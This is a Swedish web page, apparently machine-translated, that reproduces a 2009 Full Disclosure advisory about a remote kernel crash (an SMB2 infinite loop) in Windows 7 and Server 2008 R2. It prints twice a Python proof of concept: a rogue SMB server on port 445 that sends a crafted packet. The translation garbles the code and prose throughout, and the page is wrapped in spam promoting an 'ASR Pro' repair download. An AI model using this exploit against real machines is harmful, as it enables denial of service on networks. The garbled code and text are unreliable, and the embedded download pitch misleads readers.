Table of Contents
Godkänd
Om Windows 7th / Server 2008r2 Remote Kernel utan tvekan kraschar på din dator, tror vi att den här användarhandboken kan hjälpa dig att lösa problemet. g.Microsoft Windows kraftfull / Server 2008 R2 SMB Client Infinite Loop: Den utnyttjar ett enormt misslyckande att utföra operationer i deras Microsoft Windows SMB-klient för Windows 7 plus Windows Server 2008 R2. Det misslyckas oftast med den bortre kärnan. Metasploit Framework innehåller ett element för att utnyttja min sårbarhet.
g.
#! / usr / kompostbehållare / python# win7-crash.Trigger py:# fjärrskrivbordshjälp kärnkrasch på värdserver Win7 förutom 2008R2 (oändlig loop)# KeAccumulateTicks () missöden på grund av NT_ASSERT () / DbgRaiseAssertionFailure () orsakade av kraftfulla# Ändlös cykel.# INGEN BSOD, DU MÅSTE KOPPLA UR KONTAKTEN.# Att kalla det snabbt; använder order: this_script_ip_addr BLAH, fordonsolycka utan ansträngning# Författare: Laurent Gaffi¯ ¿ ½Importera Socket ServerPaket = (" x00 x00 x00 x9a" nummer tidsspann ---> måste vara 9:e, inte 9a .." xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00"" x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41"" xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00"" x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01 "" xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20"" x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x 10 xa0 x0e"" x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a")SMB2 klassrum (SocketServer.BaseRequestHandler): Def-Handle (själv): få "Vem:", self.client_address Använd "TACK SDL" Posten innebär self.request.recv (1024) self.request.send (paket) self.request.close ()lansering är lika med SocketServer.TCPServer (('', 445), SMB2) nummer lyssna på alla gränssnitt stad och län 445launch.serve_forever ()
Det här felet är ett viktigt bevis på att SDL FAIL
Målet för felet är egentligen en oändlig loop på smb1,2, förautentisering, utan tvekan krävs inga inloggningsuppgifter …
Can lanseras på det lokala nätverket på grund av (IE *)
Felet är med all sannolikhet så enkelt att det här verktyget borde ha upptäckts för två säsonger sedan av en specifik SDL som om SDL redan fanns:
netbios_header betyder struct.pack (“> i”, len (”. vara en del av (SMB_packet)) + SMB_packet
(Netbios h2-biljetterna anger längden på ett nytt nytt smb1,2-paket.)
Om netbios_header-nummer är 4 byte mindre eller kanske mer än SMB_packet, kommer situationen förmodligen helt enkelt att brytas!
VILKEN SORT ?? Skämtar du med mig var är denna SDL?!?
“Det säkraste utförande systemet på ljuset. е “;
Att din korrekta brandvägg är utarbetad bör tas bort via IE, huvudsakligen med nbns broadcast-metod (ingen kontointeraktion)
=================================================
– Släpp den stora dagen: 11 november 2009
– Upptäckt precis av: Laurent Gaffier
– Allvarlighet: medel – hög
===============================================
NS. BEKRÄFTELSE AV KONCEPTET
————————–
# win7-crash.py:
# Kör en levande fjärrkärnakrasch under Win7 och dessutom Server 2008R2 (oändlig loop)
# KeAccumulateTicks () kraschade på grund av NT_ASSERT () / DbgRaiseAssertionFailure () orsakat av- # stark oändlig loop.
# INGEN BSOD, DU HAR EN KORK.
# Att kalla det snabbt; i har: this_script_ip_addr BLAH, minska så snart som möjligt
# Upplagt av Laurent Gaffier
#
Package = (nummer ” x00 x00 x00 x9a” —> 7:e längden borde egentligen vara särskilt 9a ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 “
” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”
” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)
V. KOMMERSIELL PÅVERKAN
————————–
En angripare kan lite inaktivera vilken Windows 2008R2-server som helst många /
på det lokala nätverket kanske via IE
Vii. Patch-alternativ
————————–
är inte tillgänglig för den här platsen, din internetleverantör bryr sig inte.
Stäng SMB-funktion och portar tills giltig irs-revision tillhandahålls.
X. FÖRÄNDRINGARS HISTORIA
————————–
8 november 2009: MSRC ringde till
8 november 2009: MSRC upptäckt sårbarhet
11 nov 2009: MRSC är detta för att övertyga mig eftersom det vanligtvis finns en IPv6-bugg från olika återförsäljare som inte ska visas i säkerhetsbulletiner på flygplatser.
11 november 2009: Denna kvalitetsbugg har släppts.
XI. ANMÄRKNINGAR
————————–
Den juridiska informationen kring detta meddelande tillhandahålls “i befintligt skick”
utan utfästelser eller garantier som vanligtvis förknippas med ändamålsenlighet eller annat.
Jag accepterar inte några skador som orsakats av operatören möjligen
Missbruk av denna information.
Fullständig upplysningMailing List Arkiv
Fjärrkärna ett fordon Windows 7 Server 2008R2
Datum: gmail onsdag 16 november 2009 05:58:44 – 05:00
________________________________________________Kön Mitt avslöjande relaterat till information - lita fantastiskt nu.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlNyss postat och sponsrat av Secunia Http: // secunia-.com/
Efter datum Av Tråd
Aktuell ström:
- Windows Server 2008R2 Kraftfull fjärrkärnkrasch i grunden Laurent Gaffy (11 nov)
Godkänd
ASR Pro-reparationsverktyget är lösningen för en Windows-dator som kör långsamt, har registerproblem eller är infekterad med skadlig programvara. Detta kraftfulla och lättanvända verktyg kan snabbt diagnostisera och fixa din dator, öka prestandan, optimera minnet och förbättra säkerheten i processen. Lider inte av en trög dator längre - prova ASR Pro idag!
Mjukvaran för att fixa din PC är bara ett klick bort - ladda ner den nu.